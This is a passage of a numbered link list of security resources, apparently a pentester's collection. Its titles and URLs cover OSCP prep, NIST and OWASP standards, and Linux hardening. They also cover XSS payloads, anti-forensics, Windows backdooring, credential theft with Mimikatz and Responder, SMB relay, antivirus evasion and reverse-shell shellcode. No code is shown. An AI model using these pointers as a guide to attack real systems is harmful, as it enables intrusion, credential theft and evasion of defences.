Sessions:\n\n\n\nhttps://pastebin.com/XTwksPK7\n\n\n\n-1278-OSINT - Financial:\n\n\n\nhttps://pastebin.com/LtxkUi0Y\n\n\n\n\n-1279-Most Important Security Tools and Resources:\n\n\n\nhttps://pastebin.com/cGE8rG04\n\n\n\n-1280-OSINT resources from inteltechniques.com:\n\n\n\nhttps://pastebin.com/Zbdz7wit\n\n\n\n-1281-Red Team Tips:\n\n\nhttps://pastebin.com/AZDBAr1m\n\n\n\n-1282-OSCP Notes by Ash:\n\n\nhttps://pastebin.com/wFWx3a7U\n\n\n\n-1283-OSCP Prep:\n\n\nhttps://pastebin.com/98JG5f2v\n\n\n\n-1284-OSCP Review/Cheat Sheet:\n\n\n\nhttps://pastebin.com/JMMM7t4f\n\n\n\n-1285-OSCP Prep class:\n\n\nhttps://pastebin.com/s59GPJrr\n\n\n\n-1286-Complete Anti-Forensics Guide:\n\n\nhttps://pastebin.com/6V6wZK0i\n\n\n-1287-The Linux Command Line Cheat Sheet:\n\n\n\nhttps://pastebin.com/PUtWDKX5\n\n\n\n-1288-Command-Line Log Analysis:\n\n\nhttps://pastebin.com/WEDwpcz9\n\n\n\n-1289-An A-Z Index of the Apple macOS command line (OS X):\n\n\nhttps://pastebin.com/RmPLQA5f\n\n\n\n-1290-San Diego Exploit Development 2018:\n\n\nhttps://pastebin.com/VfwhT8Yd\n\n\n\n-1291-Windows Exploit Development Megaprimer:\n\n\nhttps://pastebin.com/DvdEW4Az\n\n\n\n-1292-Some Free Reverse engineering resources:\n\n\n\nhttps://pastebin.com/si2ThQPP\n\n\n\n\n-1293-Sans:\n\n\nhttps://pastebin.com/MKiSnjLm\n\n\n\n-1294-Metasploit Next Level:\n\n\nhttps://pastebin.com/0jC1BUiv\n\n\n\n-1295-Just playing around....:\n\n\n\nhttps://pastebin.com/gHXPzf6B\n\n\n\n-1296-Red Team Course:\n\n\nhttps://pastebin.com/YUYSXNpG\n\n\n\n-1297-New Exploit Development 2018:\n\n\n\nhttps://pastebin.com/xaRxgYqQ\n\n\n\n-1298-Good reviews of CTP/OSCE (in no particular order)::\n\n\n\nhttps://pastebin.com/RSPbatip\n\n\n\n-1299-Vulnerability Research Engineering Bookmarks Collection v1.0:\n\n\n\nhttps://pastebin.com/8mUhjGSU\n\n\n\n-1300-Professional-hacker's Pastebin :\n\n\n\nhttps://pastebin.com/u/Professional-hacker\n\n\n\n-1301-Google Cheat Sheet:\n\n\nhttp://www.googleguide.com/print/adv_op_ref.pdf\n\n\n\n-1302-Shodan for penetration testers:\n\n\n\nhttps://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf\n\n\n\n-1303-Linux networking tools:\n\n\n\nhttps://gist.github.com/miglen/70765e663c48ae0544da08c07006791f\n\n\n\n\n-1304-DNS spoofing with NetHunter:\n\n\n\nhttps://cyberarms.wordpress.com/category/nethunter-tutorial/\n\n\n\n\n-1305-Tips on writing a penetration testing report:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343\n\n\n\n\n-1306-Technical penetration report sample:\n\n\n\nhttps://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf\n\n\n\n\n\n-1307-Nessus sample reports:\n\n\n\nhttps://www.tenable.com/products/nessus/sample-reports\n\n\n\n\n-1308-Sample penetration testing report:\n\n\n\n\nhttps://www.offensive-security.com/reports/sample-penetration-testing-report.pdf\n\n\n\n\n-1309-jonh-the-ripper-cheat-sheet:\n\n\n\nhttps://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/\n\n\n\n\n-1310-ultimate guide to cracking foreign character passwords using hashcat:\n\n\n\nhttp://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has\n\n\n\n\n-1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III:\n\n\n\nhttps://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III\n\n\n\n\n-1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords:\n\n\n\nhttp://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/\n\n\n\n-1313-CSA (Cloud Security Alliance) Security White Papers:\n\n\n\nhttps://cloudsecurityalliance.org/download/\n\n\n\n-1314-NIST Security Considerations in the System Development Life Cycle:\n\n\n\nhttps://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf\n\n\n\n\n-1315-ISO 29100 information technology security techniques privacy framework:\n\n\n\nhttps://www.iso.org/standard/45123.html\n\n\n\n\n-1316-NIST National Checklist Program:\n\n\n\nhttps://nvd.nist.gov/ncp/repository\n\n\n\n-1317-OWASP Guide to Cryptography:\n\n\n\nhttps://www.owasp.org/index.php/Guide_to_Cryptography\n\n\n\n-1318-NVD (National Vulnerability Database):\n\n\n\nhttps://nvd.nist.gov/\n\n\n\n-1319-CVE details:\n\n\n\nhttps://cvedetails.com/\n\n\n\n-1320-CIS Cybersecurity Tools:\n\n\n\n\nhttps://www.cisecurity.org/cybersecurity-tools/\n\n\n\n\n-1321-Security aspects of virtualization by ENISA:\n\n\n\nhttps://www.enisa.europa.eu/publications/security-aspects-of-virtualization/\n\n\n\n-1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes:\n\n\n\nhttps://www.cisecurity.org/cis-benchmarks/\n\n\n\n\n-1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer:\n\n\n\nhttps://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html\n\n\n\n\n-1324-Docker security:\n\n\n\nhttps://docs.docker.com/engine/security/security/\n\n\n\n\n-1325-Microsoft Security Development Lifecycle:\n\n\n\nhttp://www.microsoft.com/en-us/SDL/\n\n\n\n\n-1326-OWASP SAMM Project:\n\n\n\nhttps://www.owasp.org/index.php/OWASP_SAMM_Project\n\n\n\n-1327-CWE/SANS Top 25 Most Dangerous Software Errors:\n\n\n\nhttps://cwe.mitre.org/top25/\n\n\n\n\n-1329-OWASP Vulnerable Web Applications Directory Project:\n\n\n\nhttps://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project\n\n\n\n\n-1330-CERT Secure Coding Standards:\n\n\nhttps://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards\n\n\n\n-1331-NIST Special Publication 800-53:\n\n\n\nhttps://nvd.nist.gov/800-53\n\n\n\n\n-1332-SAFECode Security White Papers:\n\n\n\n\nhttps://safecode.org/publications/\n\n\n\n\n-1333-Microsoft Threat Modeling tool 2016:\n\n\n\n\nhttps://aka.ms/tmt2016/\n\n\n\n\n-1334-Apache Metron for real-time big data security:\n\n\n\nhttp://metron.apache.org/documentation/\n\n\n\n\n-1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process:\n\n\n\nhttps://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf\n\n\n\n\n-1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems:\n\n\n\nhttp://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf\n\n\n\n\n\n-1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end communications:\n\n\n\n\nhttps://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items\n\n\n\n\n-1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis:\n\n\n\nhttp://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf\n\n\n\n\n-1339-SAFECode Fundamental Practices for Secure Software Development:\n\n\n\nhttps://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf\n\n\n\n\n\n-1340-NIST 800-64 Security Considerations in the System Development Life Cycle:\n\n\n\n\nhttps://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final\n\n\n\n-1341-SANS A Security Checklist for Web Application Design:\n\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389\n\n\n\n\n-1342-Best Practices for implementing a Security Awareness Program:\n\n\n\nhttps://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf\n\n\n\n\n-1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis:\n\n\n\nhttp://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf\n\n\n\n\n-1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems:\n\n\n\n\nhttps://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final\n\n\n\n\n-1345-SafeCode Tactical Threat Modeling:\n\n\n\nhttps://safecode.org/safecodepublications/tactical-threat-modeling/\n\n\n\n\n-1346-SANS Web Application Security Design Checklist:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389\n\n\n\n\n-1347-Data Anonymization for production data dumps:\n\n\n\nhttps://github.com/sunitparekh/data-anonymization\n\n\n\n\n-1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use It:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030\n\n\n\n\n-1349-Guide to Computer Security Log Management:\n\n\nhttps://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881\n\n\n\n\n-1350-Malware Indicators:\n\n\n\n\nhttps://github.com/citizenlab/malware-indicators\n\n\n\n\n-1351-OSINT Threat Feeds:\n\n\n\nhttps://www.circl.lu/doc/misp/feed-osint/\n\n\n\n\n-1352-SANS How to Use Threat Intelligence effectively:\n\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282\n\n\n\n\n-1353-NIST 800-150 Guide to Cyber Threat Information Sharing:\n\n\n\n\nhttps://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf\n\n\n\n\n-1354-Securing Web Application Technologies Checklist:\n\n\n\nhttps://software-security.sans.org/resources/swat\n\n\n\n-1355-Firmware Security Training:\n\n\n\n\nhttps://github.com/advanced-threat-research/firmware-security-training\n\n\n\n-1356-Burp Suite Bootcamp:\n\n\n\nhttps://pastebin.com/5sG7Rpg5\n\n\n\n\n-1357-Web app hacking:\n\n\n\nhttps://pastebin.com/ANsw7WRx\n\n\n\n\n-1358-XSS Payload:\n\n\n\nhttps://pastebin.com/EdxzE4P1\n\n\n\n-1359-XSS Filter Evasion Cheat Sheet:\n\n\n\nhttps://pastebin.com/bUutGfSy\n\n\n\n-1360-Persistence using RunOnceEx – Hidden from Autoruns.exe:\n\n\n\nhttps://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/\n\n\n\n-1361-Windows Operating System Archaeology:\n\n\n\nhttps://www.slideshare.net/enigma0x3/windows-operating-system-archaeology\n\n\n\n-1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky:\n\n\n\nhttps://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/\n\n\n\n-1363-Malware Analysis using Osquery :\n\n\n\nhttps://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec\n\n\n\n-1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals :\n\n\n\nhttps://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/\n\n\n\n\n-1365-Userland registry hijacking:\n\n\n\nhttps://3gstudent.github.io/Userland-registry-hijacking/\n\n\n\n\n-1366-Malware Hiding Techniques to Watch for: AlienVault Labs:\n\n\n\nhttps://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs\n\n\n\n-1367- Full text of ""Google hacking for penetration testers"" :\n\n\n\nhttps://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt\n\n\n\n\n-1368- Full text of ""Long, Johnny Google Hacking For Penetration Testers"" :\n\n\n\nhttps://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt\n\n\n\n\n-1369- Full text of ""Coding For Penetration Testers"" :\n\n\n\nhttps://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt\n\n\n\n\n-1370- Full text of ""Hacking For Dummies"" :\n\n\n\nhttps://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt\n\n\n\n\n-1371-Full text of ""Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. Profescience.blogspot.com"" :\n\n\n\n\nhttps://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt\n\n\n\n\n-1372- Full text of ""Social Engineering The Art Of Human Hacking"" :\n\n\n\nhttps://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt\n\n\n\n\n-1373- Full text of ""CYBER WARFARE"" :\n\n\n\nhttps://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt\n\n\n\n\n-1374-Full text of ""NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research"" :\n\n\n\n\nhttps://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt\n\n\n\n\n-1375- Full text of ""sectools"" :\n\n\n\n\nhttps://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt\n\n\n\n\n-1376- Full text of ""Aggressive network self-defense"" :\n\n\n\n\n\nhttps://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt\n\n\n\n\n\n-1377-Community Texts:\n\n\n\n\nhttps://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22\n\n\n\n\n-1378- Full text of ""Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)"" :\n\n\n\n\nhttps://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt\n\n\n\n\n-1379- Full text of ""Enzyclopedia Of Cybercrime"" :\n\n\n\nhttps://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt\n\n\n\n\n-1380- Full text of ""Information Security Management Handbook"" :\n\n\n\nhttps://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt\n\n\n\n\n\n-1381- Full text of ""ARMArchitecture Reference Manual"" :\n\n\n\n\nhttps://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt\n\n\n\n\n\n-1382- Full text of ""Metasploit The Penetration Tester S Guide"" :\n\n\n\nhttps://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt\n\n\n\n\n-1383-Tips & tricks to master Google’s search engine:\n\n\nhttps://medium.com/infosec-adventures/google-hacking-39599373be7d\n\n\n\n\n-1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) :\n\n\nhttps://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866\n\n\n\n\n-1385- Google Hacking Secrets:the Hidden Codes of Google :\n\n\n\nhttps://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google\n\n\n\n\n-1386-google hacking:\n\n\n\nhttps://www.slideshare.net/SamNizam/3-google-hacking\n\n\n\n\n\n-1387-How Penetration Testers Use Google Hacking:\n\n\n\n\nhttps://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking\n\n\n\n\n-1388-Free Automated Malware Analysis Sandboxes and Services:\n\n\n\nhttps://zeltser.com/automated-malware-analysis/\n\n\n\n\n-1389-How to get started with Malware Analysis and Reverse Engineering:\n\n\n\nhttps://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/\n\n\n\n-1390-Handy Tools And Websites For Malware Analysis:\n\n\n\nhttps://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/\n\n\n\n\n-1391-Dynamic Malware Analysis:\n\n\nhttps://prasannamundas.com/share/dynamic-malware-analysis/\n\n\n\n-1392-Intro to Radare2 for Malware Analysis:\n\n\n\nhttps://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/\n\n\n\n\n-1393-Detecting malware through static and dynamic techniques:\n\n\n\nhttps://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec...\n\n\n\n\n-1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis Tools:\n\n\n\nhttps://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools\n\n\n\n-1395-Malware Analysis Lab At Home In 5 Steps:\n\n\n\nhttps://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/\n\n\n\n\n-1396-Malware Forensics Guide - Static and Dynamic Approach:\n\n\n\nhttps://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/\n\n\n\n\n-1397-Top 30 Bug Bounty Programs in 2019:\n\n\nhttps://www.guru99.com/bug-bounty-programs.html\n\n\n\n\n-1398-Introduction - Book of BugBounty Tips:\n\n\n\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/\n\n\n\n\n-1399-List of bug bounty writeups:\n\n\n\nhttps://pentester.land/list-of-bug-bounty-writeups.html\n\n\n\n\n-1400-Tips From A Bugbounty Hunter:\n\n\n\nhttps://www.secjuice.com/bugbounty-hunter/\n\n\n\n\n-1401-Cross Site Scripting (XSS) - Book of BugBounty Tips:\n\n\n\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss\n\n\n\n\n-1402-BugBountyTips:\n\n\n\nhttps://null0xp.wordpress.com/tag/bugbountytips/\n\n\n\n\n-1403-Xss Filter Bypass Payloads:\n\n\n\nwww.oroazteca.net/mq67/xss-filter-bypass-payloads.html\n\n\n\n\n-1404-Bug Bounty Methodology:\n\n\n\nhttps://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0\n\n\n\n-1405-GDB cheat-sheet for exploit development:\n\n\n\nwww.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html\n\n\n\n\n-1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept :\n\n\n\nhttps://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept\n\n\n\n\n-1407-Exploit development tutorial :\n\n\n\nhttps://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux\n\n\n\n-1408-exploit code development:\n\n\nhttp://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf\n\n\n\n-1409-“Help Defeat Denial of Service Attacks: Step-by-Step”:\n\n\n\nhttp://www.sans.org/dosstep/\n\n\n\n\n-1410-Internet Firewalls: Frequently Asked Questions:\n\n\n\n\nhttp://www.interhack.net/pubs/fwfaq/\n\n\n\n\n-1411-Service Name and Transport Protocol Port Number:\n\n\n\nhttp://www.iana.org/assignments/port-numbers\n\n\n\n-1412-10 Useful Open Source Security Firewalls for Linux Systems:\n\n\n\nhttps://www.tecmint.com/open-source-security-firewalls-for-linux-systems/\n\n\n\n\n-1413-40 Linux Server Hardening Security Tips:\n\n\n\nhttps://www.cyberciti.biz/tips/linux-security.html\n\n\n\n\n-1414-Linux hardening: A 15-step checklist for a secure Linux server :\n\n\n\nhttps://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server\n\n\n\n-1415-25 Hardening Security Tips for Linux Servers:\n\n\n\nhttps://www.tecmint.com/linux-server-hardening-security-tips/\n\n\n\n\n-1416-How to Harden Unix/Linux Systems & Close Security Gaps:\n\n\n\nhttps://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps\n\n\n\n\n-1417-34 Linux Server Security Tips & Checklists for Sysadmins:\n\n\n\nhttps://www.process.st/server-security/\n\n\n\n\n-1418-Linux Hardening:\n\n\n\nhttps://www.slideshare.net/MichaelBoelen/linux-hardening\n\n\n\n\n-1419-23 Hardening Tips to Secure your Linux Server:\n\n\n\nhttps://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/\n\n\n\n\n-1420-What is the Windows Registry? :\n\n\nhttps://www.computerhope.com/jargon/r/registry.htm\n\n\n\n\n-1421-Windows Registry, Everything You Need To Know:\n\n\n\nhttps://www.gammadyne.com/registry.htm\n\n\n\n-1422-Windows Registry Tutorial:\n\n\n\nhttps://www.akadia.com/services/windows_registry_tutorial.html\n\n\n\n\n-1423-5 Tools to Scan a Linux Server for Malware and Rootkits:\n\n\n\nhttps://www.tecmint.com/scan-linux-for-malware-and-rootkits/\n\n\n\n-1424-Subdomain takeover dew to missconfigured project settings for Custom domain .:\n\n\n\nhttps://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969\n\n\n\n\n-1425-Massive Subdomains p0wned:\n\n\n\nhttps://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e\n\n\n\n-1426-Subdomain Takeover: Basics:\n\n\n\nhttps://0xpatrik.com/subdomain-takeover-basics/\n\n\n\n-1427-Subdomain Takeover: Finding Candidates:\n\n\n\nhttps://0xpatrik.com/subdomain-takeover-candidates/\n\n\n\n-1428-Bugcrowd's Domain & Subdomain Takeover!:\n\n\n\nhttps://bugbountypoc.com/bugcrowds-domain-takeover/\n\n\n\n\n-1429-What Are Subdomain Takeovers, How to Test and Avoid Them?:\n\n\n\nhttps://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid\n\n\n\n\n-1430-Finding Candidates for Subdomain Takeovers:\n\n\n\nhttps://jarv.is/notes/finding-candidates-subdomain-takeovers/\n\n\n\n\n-1431-Subdomain takeover of blog.snapchat.com:\n\n\n\nhttps://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7\n\n\n\n\n-1432-Hostile Subdomain takeove:\n\n\n\nhttps://labs.detectify.com/tag/hostile-subdomain-takeover/\n\n\n\n-1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users:\n\n\n\nhttps://www.safetydetective.com/blog/microsoft-outlook/\n\n\n\n\n-1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? & Exploit It?:\n\n\n\nhttps://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/\n\n\n\n\n-1435-Subdomain takeover detection with AQUATONE:\n\n\n\nhttps://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/\n\n\n\n-1436-A hostile subdomain takeover! – Breaking application security:\n\n\n\nhttps://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/\n\n\n\n\n-1437-Web Development Reading List:\n\n\n\nhttps://www.smashingmagazine.com/2017/03/web-development-reading-list-172/\n\n\n\n\n-1438-CSRF Attack can lead to Stored XSS:\n\n\n\nhttps://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f\n\n\n\n-1439-What is Mimikatz: The Beginner's Guide | Varonis:\n\n\n\nhttps://www.varonis.com/bog/what-is-mimikatz\n\n\n\n-1440-Preventing Mimikatz Attacks :\n\n\n\nhttps://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5\n\n\n\n\n-1441-Mimikatz tutorial: How it hacks Windows passwords, credentials:\n\n\n\nhttps://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials\n\n\n\n\n-1442-Mimikatz: Walkthrough [Updated 2019]:\n\n\n\nhttps://resources.infosecinstitute.com/mimikatz-walkthrough/\n\n\n\n-1443-Mimikatz -Windows Tutorial for Beginner:\n\n\n\nhttps://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/\n\n\n\n\n-1444-Mitigations against Mimikatz Style Attacks:\n\n\n\nhttps://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks\n\n\n\n\n-1445-Exploring Mimikatz - Part 1 :\n\n\n\nhttps://blog.xpnsec.com/exploring-mimikatz-part-1/\n\n\n\n\n-1446-Powershell AV Evasion. Running Mimikatz with PowerLine:\n\n\n\nhttps://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html\n\n\n\n\n-1447-How to Steal Windows Credentials with Mimikatz and Metasploit:\n\n\n\n\nhttps://www.hackingloops.com/mimikatz/\n\n\n\n\n-1448-Retrieving NTLM Hashes without touching LSASS:\n\n\n\nhttps://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/\n\n\n\n\n-1449-From Responder to NT Authority\SYSTEM:\n\n\n\n\nhttps://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319\n\n\n\n\n-1450-Getting Creds via NTLMv2:\n\n\n\nhttps://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html\n\n\n\n\n\n-1451-Living off the land: stealing NetNTLM hashes:\n\n\n\n\nhttps://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html\n\n\n\n\n\n-1452-(How To) Using Responder to capture passwords on a Windows:\n\n\n\nwww.securityflux.com/?p=303\n\n\n\n\n\n-1453-Pwning with Responder - A Pentester's Guide:\n\n\n\n\nhttps://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/\n\n\n\n\n-1454-LLMNR and NBT-NS Poisoning Using Responder:\n\n\n\n\nhttps://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/\n\n\n\n\n-1455-Responder - Ultimate Guide :\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/\n\n\n\n-1456-Responder - CheatSheet:\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/\n\n\n\n\n-1457-LM, NTLM, Net-NTLMv2, oh my! :\n\n\n\nhttps://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4\n\n\n\n\n-1458-SMB Relay Attack Tutorial:\n\n\n\n\nhttps://intrinium.com/smb-relay-attack-tutorial\n\n\n\n-1459-Cracking NTLMv2 responses captured using responder:\n\n\n\n\nhttps://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/\n\n\n\n\n-1460-Skip Cracking Responder Hashes and Relay Them:\n\n\n\nhttps://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/\n\n\n\n\n-1461-Metasploit's First Antivirus Evasion Modules:\n\n\n\n\nhttps://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/\n\n\n\n\n-1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter:\n\n\n\n\nhttps://www.hackingloops.com/evading-anti-virus-shellter/\n\n\n\n\n\n-1463-Evading AV with Shellter:\n\n\n\nhttps://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/\n\n\n\n\n\n-1464-Shellter-A Shellcode Injecting Tool :\n\n\n\n\nhttps://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/\n\n\n\n\n-1465-Bypassing antivirus programs using SHELLTER:\n\n\n\nhttps://myhackstuff.com/shellter-bypassing-antivirus-programs/\n\n\n\n\n-1466-John the Ripper step-by-step tutorials for end-users :\n\n\n\nopenwall.info/wiki/john/tutorials\n\n\n\n\n-1467-Beginners Guide for John the Ripper (Part 1):\n\n\n\nhttps://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/\n\n\n\n\n-1468-John the Ripper Basics Tutorial:\n\n\n\nhttps://ultimatepeter.com/john-the-ripper-basics-tutorial/\n\n\n\n\n-1469-Crack Windows password with john the ripper:\n\n\n\nhttps://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/\n\n\n\n\n-1470-Getting Started Cracking Password Hashes with John the Ripper :\n\n\n\nhttps://www.tunnelsup.com/getting-started-cracking-password-hashes/\n\n\n\n-1471-Shell code exploit with Buffer overflow:\n\n\n\nhttps://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b\n\n\n\n-1472-Shellcoding for Linux and Windows Tutorial :\n\n\n\nwww.vividmachines.com/shellcode/shellcode.html\n\n\n\n\n-1473-Buffer Overflow Practical Examples :\n\n\n\n\nhttps://0xrick.github.io/binary-exploitation/bof5/\n\n\n\n\n-1474-Msfvenom shellcode analysis:\n\n\n\nhttps://snowscan.io/msfvenom-shellcode-analysis/\n\n\n\n\n-1475-Process Continuation Shellcode:\n\n\n\nhttps://azeria-labs.com/process-continuation-shellcode/\n\n\n\n\n-1476-Dynamic Shellcode Execution:\n\n\n\nhttps://www.countercept.com/blog/dynamic-shellcode-execution/\n\n\n\n-1477-Tutorials: Writing shellcode to binary files:\n\n\n\nhttps://www.fuzzysecurity.com/tutorials/7.html\n\n\n\n\n\n-1478-Creating Shellcode for an Egg Hunter :\n\n\n\nhttps://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html\n\n\n\n\n-1479-How to: Shellcode to reverse bind a shell with netcat :\n\n\n\nwww.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat\n\n\n\n-1480-Bashing the Bash — Replacing Shell Scripts with Python:\n\n\n\nhttps://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989\n\n\n\n\n-1481-How to See All Devices on Your Network With nmap on 